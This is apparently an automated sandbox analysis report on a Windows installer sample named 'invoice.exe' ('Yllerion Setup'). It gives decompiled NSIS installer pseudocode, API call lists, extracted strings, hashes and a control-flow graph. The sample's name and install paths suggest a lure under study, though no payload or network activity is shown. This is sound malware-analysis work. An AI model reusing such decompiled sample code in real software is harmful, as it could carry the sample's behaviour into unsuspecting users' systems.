                                            				E00405F65(_t161, _t51);
                                            				 *0x42f400 = GetModuleHandleA(0);
                                            				_t54 = _t161;
                                            				if("\"C:\\Users\\Arthur\\Desktop\\invoice.exe\"" == 0x22) {
                                            					 *(_t165 + 0x14) = 0x22;
                                            					_t54 =  &M00435001;
                                            				}
                                            				_t56 = CharNextA(E00405928(_t54,  *(_t165 + 0x14)));
                                            				 *(_t165 + 0x1c) = _t56;
                                            				while(1) {
                                            					_t123 =  *_t56;
                                            					_t173 = _t123;
                                            					if(_t123 == 0) {
                                            						break;
                                            					}
                                            					__eflags = _t123 - 0x20;
                                            					if(_t123 != 0x20) {
                                            						L13:
                                            						__eflags =  *_t56 - 0x22;
                                            						 *(_t165 + 0x14) = 0x20;
                                            						if( *_t56 == 0x22) {
                                            							_t56 =  &(_t56[1]);
                                            							__eflags = _t56;
                                            							 *(_t165 + 0x14) = 0x22;
                                            						}
                                            						__eflags =  *_t56 - 0x2f;
                                            						if( *_t56 != 0x2f) {
                                            							L25:
                                            							_t56 = E00405928(_t56,  *(_t165 + 0x14));
                                            							__eflags =  *_t56 - 0x22;
                                            							if(__eflags == 0) {
                                            								_t56 =  &(_t56[1]);
                                            								__eflags = _t56;
                                            							}
                                            							continue;
                                            						} else {
                                            							_t56 =  &(_t56[1]);
                                            							__eflags =  *_t56 - 0x53;
                                            							if( *_t56 != 0x53) {
                                            								L20:
                                            								__eflags =  *_t56 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
                                            								if( *_t56 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
                                            									L24:
                                            									__eflags =  *((intOrPtr*)(_t56 - 2)) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
                                            									if( *((intOrPtr*)(_t56 - 2)) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
                                            										 *((char*)(_t56 - 2)) = 0;
                                            										__eflags =  &(_t56[2]);
                                            										E00405F65("C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\predepository",  &(_t56[2]));
                                            										L30:
                                            										_t158 = "C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
                                            										GetTempPathA(0x400, _t158);
                                            										_t60 = E004031C0(_t173);
                                            										_t174 = _t60;
                                            										if(_t60 != 0) {
                                            											L33:
                                            											DeleteFileA("1033"); // executed
                                            											_t62 = E00402D48(_t176,  *(_t165 + 0x20)); // executed
                                            											 *((intOrPtr*)(_t165 + 0x10)) = _t62;
                                            											if(_t62 != 0) {
                                            												L43:
                                            												E004036DB();
                                            												__imp__OleUninitialize();
                                            												_t186 =  *((intOrPtr*)(_t165 + 0x10));
                                            												if( *((intOrPtr*)(_t165 + 0x10)) == 0) {
                                            													__eflags =  *0x42f4b4;
                                            													if( *0x42f4b4 == 0) {
                                            														L67:
                                            														_t64 =  *0x42f4cc;
                                            														__eflags = _t64 - 0xffffffff;
                                            														if(_t64 != 0xffffffff) {
                                            															 *(_t165 + 0x14) = _t64;
                                            														}
                                            														ExitProcess( *(_t165 + 0x14));
                                            													}
                                            													_t67 = OpenProcessToken(GetCurrentProcess(), 0x28, _t165 + 0x18);
                                            													__eflags = _t67;
                                            													_t151 = 2;
                                            													if(_t67 != 0) {
                                            														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t165 + 0x24);
                                            														 *(_t165 + 0x38) = 1;
                                            														 *(_t165 + 0x44) = _t151;
                                            														AdjustTokenPrivileges( *(_t165 + 0x2c), 0, _t165 + 0x28, 0, 0, 0);
                                            													}
                                            													_t68 = E004062FD(4);
                                            													__eflags = _t68;
                                            													if(_t68 == 0) {
                                            														L65:
                                            														_t69 = ExitWindowsEx(_t151, 0x80040002);
                                            														__eflags = _t69;
                                            														if(_t69 != 0) {
                                            															goto L67;
                                            														}
                                            														goto L66;
                                            													} else {
                                            														_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
                                            														__eflags = _t71;
                                            														if(_t71 == 0) {
                                            															L66:
                                            															E0040140B(9);
                                            															goto L67;
                                            														}
                                            														goto L65;
                                            													}
                                            												}
                                            												E00405681( *((intOrPtr*)(_t165 + 0x10)), 0x200010);
                                            												ExitProcess(2);
                                            											}
                                            											if( *0x42f420 == 0) {
                                            												L42:
                                            												 *0x42f4cc =  *0x42f4cc | 0xffffffff;
                                            												 *(_t165 + 0x18) = E004037B5( *0x42f4cc);
                                            												goto L43;
                                            											}
                                            											_t154 = E00405928(_t161, 0);
                                            											if(_t154 < _t161) {
                                            												L39:
                                            												_t183 = _t154 - _t161;
                                            												 *((intOrPtr*)(_t165 + 0x10)) = "Error launching installer";
                                            												if(_t154 < _t161) {
                                            													_t152 = E004055EC(_t186);
                                            													lstrcatA(_t158, "~nsu");
                                            													if(_t152 != 0) {
                                            														lstrcatA(_t158, "A");
                                            													}
                                            													lstrcatA(_t158, ".tmp");
                                            													_t163 = "C:\\Users\\Arthur\\Desktop";
                                            													if(lstrcmpiA(_t158, "C:\\Users\\Arthur\\Desktop") != 0) {
                                            														_push(_t158);
                                            														if(_t152 == 0) {
                                            															E004055CF();
                                            														} else {
                                            															E00405552();
                                            														}
                                            														SetCurrentDirectoryA(_t158);
                                            														_t190 = "C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\predepository"; // 0x43
                                            														if(_t190 == 0) {
                                            															E00405F65("C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\predepository", _t163);
                                            														}
                                            														E00405F65(0x430000,  *(_t165 + 0x1c));
                                            														_t138 = "A";
                                            														_t164 = 0x1a;
                                            														 *0x430400 = "A";
                                            														do {
                                            															E00405F87(0, 0x429430, _t158, 0x429430,  *((intOrPtr*)( *0x42f414 + 0x120)));
                                            															DeleteFileA(0x429430);
                                            															if( *((intOrPtr*)(_t165 + 0x10)) != 0 && CopyFileA("C:\\Users\\Arthur\\Desktop\\invoice.exe", 0x429430, ?str?) != 0) {
                                            																E00405D44(_t138, 0x429430, 0);
                                            																E00405F87(0, 0x429430, _t158, 0x429430,  *((intOrPtr*)( *0x42f414 + 0x124)));
                                            																_t95 = E00405604(0x429430);
                                            																if(_t95 != 0) {
                                            																	CloseHandle(_t95);
                                            																	 *((intOrPtr*)(_t165 + 0x10)) = 0;
                                            																}
                                            															}
                                            															 *0x430400 =  *0x430400 + 1;
                                            															_t164 = _t164 - 1;
                                            														} while (_t164 != 0);
                                            														E00405D44(_t138, _t158, 0);
                                            													}
                                            													goto L43;
                                            												}
                                            												 *_t154 = 0;
                                            												_t155 = _t154 + 4;
                                            												if(E004059EB(_t183, _t154 + 4) == 0) {
                                            													goto L43;
                                            												}
                                            												E00405F65("C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\predepository", _t155);
                                            												E00405F65("C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\predepository\\Diskofils\\Justiciaryship", _t155);
                                            												 *((intOrPtr*)(_t165 + 0x10)) = 0;
                                            												goto L42;
                                            											}
                                            											_t111 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
                                            											while( *_t154 != _t111) {
                                            												_t154 = _t154 - 1;
                                            												if(_t154 >= _t161) {
                                            													continue;
                                            												}
                                            												goto L39;
                                            											}
                                            											goto L39;
                                            										}
                                            										GetWindowsDirectoryA(_t158, 0x3fb);
                                            										lstrcatA(_t158, "\\Temp");
                                            										_t114 = E004031C0(_t174);
                                            										_t175 = _t114;
                                            										if(_t114 != 0) {
                                            											goto L33;
                                            										}
                                            										GetTempPathA(0x3fc, _t158);
                                            										lstrcatA(_t158, "Low");
                                            										SetEnvironmentVariableA("TEMP", _t158);
                                            										SetEnvironmentVariableA("TMP", _t158);
                                            										_t119 = E004031C0(_t175);
                                            										_t176 = _t119;
                                            										if(_t119 == 0) {
                                            											goto L43;
                                            										}
                                            										goto L33;
                                            									}
                                            									goto L25;
                                            								}
                                            								_t142 = _t56[4];
                                            								__eflags = _t142 - 0x20;
                                            								if(_t142 == 0x20) {
                                            									L23:
                                            									_t15 = _t165 + 0x20;
                                            									 *_t15 =  *(_t165 + 0x20) | 0x00000004;
                                            									__eflags =  *_t15;
                                            									goto L24;
                                            								}
                                            								__eflags = _t142;
                                            								if(_t142 != 0) {
                                            									goto L24;
                                            								}
                                            								goto L23;
                                            							}
                                            							_t143 = _t56[1];
                                            							__eflags = _t143 - 0x20;
                                            							if(_t143 == 0x20) {
                                            								L19:
                                            								 *0x42f4c0 = 1;
                                            								goto L20;
                                            							}
                                            							__eflags = _t143;
                                            							if(_t143 != 0) {
                                            								goto L20;
                                            							}
                                            							goto L19;
                                            						}
                                            					} else {
                                            						goto L12;
                                            					}
                                            					do {
                                            						L12:
                                            						_t56 =  &(_t56[1]);
                                            						__eflags =  *_t56 - 0x20;
                                            					} while ( *_t56 == 0x20);
                                            					goto L13;
                                            				}
                                            				goto L30;
                                            			}

































                                            0x00000000
                                            0x00403509
                                            0x0040348e
                                            0x00403492
                                            0x004034c8
                                            0x004034c8
                                            0x004034ca
                                            0x004034d2
                                            0x00403544
                                            0x00403546
                                            0x0040354d
                                            0x00403555
                                            0x00403555
                                            0x00403560
                                            0x00403565
                                            0x00403574
                                            0x00403578
                                            0x00403579
                                            0x00403582
                                            0x0040357b
                                            0x0040357b
                                            0x0040357b
                                            0x00403588
                                            0x0040358e
                                            0x00403594
                                            0x0040359c
                                            0x0040359c
                                            0x004035aa
                                            0x004035af
                                            0x004035c1
                                            0x004035c9
                                            0x004035cf
                                            0x004035db
                                            0x004035e1
                                            0x004035eb
                                            0x00403601
                                            0x00403612
                                            0x00403618
                                            0x0040361f
                                            0x00403622
                                            0x00403628
                                            0x00403628
                                            0x0040361f
                                            0x0040362c
                                            0x00403632
                                            0x00403632
                                            0x00403637
                                            0x00403637
                                            0x00000000
                                            0x00403574
                                            0x004034d4
                                            0x004034d6
                                            0x004034e1
                                            0x00000000
                                            0x00000000
                                            0x004034e9
                                            0x004034f4
                                            0x004034f9
                                            0x00000000
                                            0x004034f9
                                            0x004034bd
                                            0x004034bf
                                            0x004034c3
                                            0x004034c6
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004034c6
                                            0x00000000
                                            0x004034bf
                                            0x0040340f
                                            0x0040341b
                                            0x00403420
                                            0x00403425
                                            0x00403427
                                            0x00000000
                                            0x00000000
                                            0x0040342f
                                            0x00403437
                                            0x00403448
                                            0x00403450
                                            0x00403452
                                            0x00403457
                                            0x00403459
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403459
                                            0x00000000
                                            0x004033be
                                            0x0040337f
                                            0x00403382
                                            0x00403385
                                            0x0040338b
                                            0x0040338b
                                            0x0040338b
                                            0x0040338b
                                            0x00000000
                                            0x0040338b
                                            0x00403387
                                            0x00403389
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403389
                                            0x0040333a
                                            0x0040333d
                                            0x00403340
                                            0x00403346
                                            0x00403346
                                            0x00000000
                                            0x00403346
                                            0x00403342
                                            0x00403344
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403344
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403315
                                            0x00403315
                                            0x00403315
                                            0x00403316
                                            0x00403316
                                            0x00000000
                                            0x00403315
                                            0x00000000

                                            APIs
                                            • SetErrorMode.KERNELBASE ref: 00403216
                                            • GetVersion.KERNEL32 ref: 0040321C
                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040324F
                                            • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040328B
                                            • OleInitialize.OLE32(00000000), ref: 00403292
                                            • SHGetFileInfoA.SHELL32(00429830,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032AE
                                            • GetCommandLineA.KERNEL32(Yllerion Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004032C3
                                            • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\invoice.exe",00000000,?,00000006,00000008,0000000A), ref: 004032D6
                                            • CharNextA.USER32(00000000,"C:\Users\user\Desktop\invoice.exe",00000020,?,00000006,00000008,0000000A), ref: 00403301
                                            • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 004033FE
                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 0040340F
                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040341B
                                            • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040342F
                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403437
                                            • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403448
                                            • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403450
                                            • DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403464
                                              • Part of subcall function 004062FD: GetModuleHandleA.KERNEL32(?,?,?,00403264,0000000A), ref: 0040630F
                                              • Part of subcall function 004062FD: GetProcAddress.KERNEL32(00000000,?), ref: 0040632A
                                              • Part of subcall function 00405F65: lstrcpynA.KERNEL32(?,?,00000400,004032C3,Yllerion Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F72
                                              • Part of subcall function 004037B5: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository,1033,Yllerion Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Yllerion Setup: Installing,00000000,00000002,76793410), ref: 004038A5
                                              • Part of subcall function 004037B5: lstrcmpiA.KERNEL32(?,.exe), ref: 004038B8
                                              • Part of subcall function 004037B5: GetFileAttributesA.KERNEL32(Call), ref: 004038C3
                                              • Part of subcall function 004037B5: LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository), ref: 0040390C
                                              • Part of subcall function 004037B5: RegisterClassA.USER32(0042EBA0), ref: 00403949
                                              • Part of subcall function 004036DB: CloseHandle.KERNEL32(000002A4,00403512,?,?,00000006,00000008,0000000A), ref: 004036E6
                                            • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 00403512
                                            • ExitProcess.KERNEL32 ref: 00403533
                                            • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403650
                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403657
                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040366F
                                            • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 0040368E
                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004036B2
                                            • ExitProcess.KERNEL32 ref: 004036D5
                                              • Part of subcall function 00405681: MessageBoxIndirectA.USER32(0040A218), ref: 004056DC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: Process$ExitFileHandle$EnvironmentModulePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpilstrcpyn
                                            • String ID: "$"C:\Users\user\Desktop\invoice.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Diskofils\Justiciaryship$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\invoice.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$Yllerion Setup$\Temp$`Kzv$~nsu
                                            • API String ID: 3855923921-430490803
                                            • Opcode ID: b823c1f3407b5428210c909c51c2acc25d2a7094c9d0c145c1e4b304f3d6dece
                                            • Instruction ID: 41c275c355797b12fd9b138c60a2ad170ddd3a1f93bd6a9867a2704463122372
                                            • Opcode Fuzzy Hash: b823c1f3407b5428210c909c51c2acc25d2a7094c9d0c145c1e4b304f3d6dece
                                            • Instruction Fuzzy Hash: 0DC1E470604741AAD7216F759E49B2F3EACAF45706F44053FF581B61E2CB7C8A098B2E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 134 4051ca-4051e6 135 405375-40537b 134->135 136 4051ec-4052b3 GetDlgItem * 3 call 40405b call 40492a GetClientRect GetSystemMetrics SendMessageA * 2 134->136 138 4053a5-4053b1 135->138 139 40537d-40539f GetDlgItem CreateThread CloseHandle 135->139 158 4052d1-4052d4 136->158 159 4052b5-4052cf SendMessageA * 2 136->159 141 4053d3-4053d9 138->141 142 4053b3-4053b9 138->142 139->138 143 4053db-4053e1 141->143 144 40542e-405431 141->144 146 4053f4-4053fb call 40408d 142->146 147 4053bb-4053ce ShowWindow * 2 call 40405b 142->147 148 4053e3-4053ef call 403fff 143->148 149 405407-405417 ShowWindow 143->149 144->146 152 405433-405439 144->152 155 405400-405404 146->155 147->141 148->146 156 405427-405429 call 403fff 149->156 157 405419-405422 call 40508c 149->157 152->146 160 40543b-40544e SendMessageA 152->160 156->144 157->156 163 4052e4-4052fb call 404026 158->163 164 4052d6-4052e2 SendMessageA 158->164 159->158 165 405454-405480 CreatePopupMenu call 405f87 AppendMenuA 160->165 166 40554b-40554d 160->166 173 405331-405352 GetDlgItem SendMessageA 163->173 174 4052fd-405311 ShowWindow 163->174 164->163 171 405482-405492 GetWindowRect 165->171 172 405495-4054ab TrackPopupMenu 165->172 166->155 171->172 172->166 175 4054b1-4054cb 172->175 173->166 178 405358-405370 SendMessageA * 2 173->178 176 405320 174->176 177 405313-40531e ShowWindow 174->177 179 4054d0-4054eb SendMessageA 175->179 180 405326-40532c call 40405b 176->180 177->180 178->166 179->179 181 4054ed-40550d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 179->181 180->173 183 40550f-40552f SendMessageA 181->183 183->183 184 405531-405545 GlobalUnlock SetClipboardData CloseClipboard 183->184 184->166
                                            C-Code - Quality: 96%
                                            			E004051CA(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                            				struct HWND__* _v8;
                                            				struct tagRECT _v24;
                                            				void* _v32;
                                            				signed int _v36;
                                            				int _v40;
                                            				int _v44;
                                            				signed int _v48;
                                            				int _v52;
                                            				void* _v56;
                                            				void* _v64;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				struct HWND__* _t87;
                                            				struct HWND__* _t89;
                                            				long _t90;
                                            				int _t95;
                                            				int _t96;
                                            				long _t99;
                                            				void* _t102;
                                            				intOrPtr _t113;
                                            				void* _t121;
                                            				intOrPtr _t124;
                                            				struct HWND__* _t128;
                                            				int _t150;
                                            				int _t153;
                                            				long _t157;
                                            				struct HWND__* _t161;
                                            				struct HMENU__* _t163;
                                            				long _t165;
                                            				void* _t166;
                                            				char* _t167;
                                            				char* _t168;
                                            				int _t169;
                                            
                                            				_t87 =  *0x42ebe4; // 0x103c2
                                            				_t157 = _a8;
                                            				_t150 = 0;
                                            				_v8 = _t87;
                                            				if(_t157 != 0x110) {
                                            					__eflags = _t157 - 0x405;
                                            					if(_t157 == 0x405) {
                                            						_t121 = CreateThread(0, 0, E0040515E, GetDlgItem(_a4, 0x3ec), 0,  &_a8); // executed
                                            						CloseHandle(_t121);
                                            					}
                                            					__eflags = _t157 - 0x111;
                                            					if(_t157 != 0x111) {
                                            						L17:
                                            						__eflags = _t157 - 0x404;
                                            						if(_t157 != 0x404) {
                                            							L25:
                                            							__eflags = _t157 - 0x7b;
                                            							if(_t157 != 0x7b) {
                                            								goto L20;
                                            							}
                                            							_t89 = _v8;
                                            							__eflags = _a12 - _t89;
                                            							if(_a12 != _t89) {
                                            								goto L20;
                                            							}
                                            							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
                                            							__eflags = _t90 - _t150;
                                            							_a12 = _t90;
                                            							if(_t90 <= _t150) {
                                            								L36:
                                            								return 0;
                                            							}
                                            							_t163 = CreatePopupMenu();
                                            							AppendMenuA(_t163, _t150, "true", E00405F87(_t150, _t157, _t163, _t150, 0xffffffe1));
                                            							_t95 = _a16;
                                            							__eflags = _a16 - 0xffffffff;
                                            							_t153 = _a16 >> 0x10;
                                            							if(_a16 == 0xffffffff) {
                                            								GetWindowRect(_v8,  &_v24);
                                            								_t95 = _v24.left;
                                            								_t153 = _v24.top;
                                            							}
                                            							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
                                            							__eflags = _t96 - 1;
                                            							if(_t96 == 1) {
                                            								_t165 = 1;
                                            								__eflags = 1;
                                            								_v56 = _t150;
                                            								_v44 = 0x42a870;
                                            								_v40 = 0x1000;
                                            								_a4 = _a12;
                                            								do {
                                            									_a4 = _a4 - 1;
                                            									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
                                            									__eflags = _a4 - _t150;
                                            									_t165 = _t165 + _t99 + 2;
                                            								} while (_a4 != _t150);
                                            								OpenClipboard(_t150);
                                            								EmptyClipboard();
                                            								_t102 = GlobalAlloc(0x42, _t165);
                                            								_a4 = _t102;
                                            								_t166 = GlobalLock(_t102);
                                            								do {
                                            									_v44 = _t166;
                                            									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
                                            									 *_t167 = 0xd;
                                            									_t168 = _t167 + 1;
                                            									 *_t168 = 0xa;
                                            									_t166 = _t168 + 1;
                                            									_t150 = _t150 + 1;
                                            									__eflags = _t150 - _a12;
                                            								} while (_t150 < _a12);
                                            								GlobalUnlock(_a4);
                                            								SetClipboardData("true", _a4);
                                            								CloseClipboard();
                                            							}
                                            							goto L36;
                                            						}
                                            						__eflags =  *0x42ebcc - _t150; // 0x0
                                            						if(__eflags == 0) {
                                            							ShowWindow( *0x42f408, 8);
                                            							__eflags =  *0x42f4ac - _t150;
                                            							if( *0x42f4ac == _t150) {
                                            								_t113 =  *0x42a048; // 0x67d2e4
                                            								_t55 = _t113 + 0x34; // 0xffffffd4
                                            								E0040508C( *_t55, _t150);
                                            							}
                                            							E00403FFF("true");
                                            							goto L25;
                                            						}
                                            						 *0x429c40 = 2;
                                            						E00403FFF(0x78);
                                            						goto L20;
                                            					} else {
                                            						__eflags = _a12 - 0x403;
                                            						if(_a12 != 0x403) {
                                            							L20:
                                            							return E0040408D(_t157, _a12, _a16);
                                            						}
                                            						ShowWindow( *0x42ebd0, _t150);
                                            						ShowWindow(_v8, 8);
                                            						E0040405B(_v8);
                                            						goto L17;
                                            					}
                                            				}
                                            				_v48 = _v48 | 0xffffffff;
                                            				_v36 = _v36 | 0xffffffff;
                                            				_t169 = 2;
                                            				_v56 = _t169;
                                            				_v52 = 0;
                                            				_v44 = 0;
                                            				_v40 = 0;
                                            				asm("stosd");
                                            				asm("stosd");
                                            				_t124 =  *0x42f414;
                                            				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
                                            				_a8 =  *((intOrPtr*)(_t124 + 0x60));
                                            				 *0x42ebd0 = GetDlgItem(_a4, 0x403);
                                            				 *0x42ebc8 = GetDlgItem(_a4, 0x3ee);
                                            				_t128 = GetDlgItem(_a4, 0x3f8);
                                            				 *0x42ebe4 = _t128;
                                            				_v8 = _t128;
                                            				E0040405B( *0x42ebd0);
                                            				 *0x42ebd4 = E0040492A(4);
                                            				 *0x42ebec = 0;
                                            				GetClientRect(_v8,  &_v24);
                                            				_v48 = _v24.right - GetSystemMetrics(_t169);
                                            				SendMessageA(_v8, 0x101b, 0,  &_v56); // executed
                                            				SendMessageA(_v8, 0x1036, 0x4000, 0x4000); // executed
                                            				if(_a12 >= 0) {
                                            					SendMessageA(_v8, 0x1001, 0, _a12);
                                            					SendMessageA(_v8, 0x1026, 0, _a12);
                                            				}
                                            				if(_a8 >= _t150) {
                                            					SendMessageA(_v8, 0x1024, _t150, _a8);
                                            				}
                                            				_push( *((intOrPtr*)(_a16 + 0x30)));
                                            				_push(0x1b);
                                            				E00404026(_a4);
                                            				if(( *0x42f41c & 0x00000003) != 0) {
                                            					ShowWindow( *0x42ebd0, _t150);
                                            					if(( *0x42f41c & 0x00000002) != 0) {
                                            						 *0x42ebd0 = _t150;
                                            					} else {
                                            						ShowWindow(_v8, 8);
                                            					}
                                            					E0040405B( *0x42ebc8);
                                            				}
                                            				_t161 = GetDlgItem(_a4, 0x3ec);
                                            				SendMessageA(_t161, 0x401, _t150, 0x75300000);
                                            				if(( *0x42f41c & 0x00000004) != 0) {
                                            					SendMessageA(_t161, 0x409, _t150, _a8);
                                            					SendMessageA(_t161, 0x2001, _t150, _a12);
                                            				}
                                            				goto L36;
                                            			}

                                            APIs
                                            • GetDlgItem.USER32(?,00000403), ref: 00405229
                                            • GetDlgItem.USER32(?,000003EE), ref: 00405238
                                            • GetClientRect.USER32(?,?), ref: 00405275
                                            • GetSystemMetrics.USER32(00000002), ref: 0040527C
                                            • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040529D
                                            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052AE
                                            • SendMessageA.USER32(?,00001001,00000000,?), ref: 004052C1
                                            • SendMessageA.USER32(?,00001026,00000000,?), ref: 004052CF
                                            • SendMessageA.USER32(?,00001024,00000000,?), ref: 004052E2
                                            • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405304
                                            • ShowWindow.USER32(?,00000008), ref: 00405318
                                            • GetDlgItem.USER32(?,000003EC), ref: 00405339
                                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405349
                                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405362
                                            • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040536E
                                            • GetDlgItem.USER32(?,000003F8), ref: 00405247
                                              • Part of subcall function 0040405B: SendMessageA.USER32(00000028,?,?,00403E8B), ref: 00404069
                                            • GetDlgItem.USER32(?,000003EC), ref: 0040538A
                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000515E,00000000), ref: 00405398
                                            • CloseHandle.KERNELBASE(00000000), ref: 0040539F
                                            • ShowWindow.USER32(00000000), ref: 004053C2
                                            • ShowWindow.USER32(?,00000008), ref: 004053C9
                                            • ShowWindow.USER32(00000008), ref: 0040540F
                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405443
                                            • CreatePopupMenu.USER32 ref: 00405454
                                            • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 00405469
                                            • GetWindowRect.USER32(?,000000FF), ref: 00405489
                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054A2
                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054DE
                                            • OpenClipboard.USER32(00000000), ref: 004054EE
                                            • EmptyClipboard.USER32 ref: 004054F4
                                            • GlobalAlloc.KERNEL32(00000042,?), ref: 004054FD
                                            • GlobalLock.KERNEL32(00000000), ref: 00405507
                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040551B
                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405534
                                            • SetClipboardData.USER32(?,00000000), ref: 0040553F
                                            • CloseClipboard.USER32 ref: 00405545
                                            Strings
                                            • Yllerion Setup: Installing, xrefs: 004054BA
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
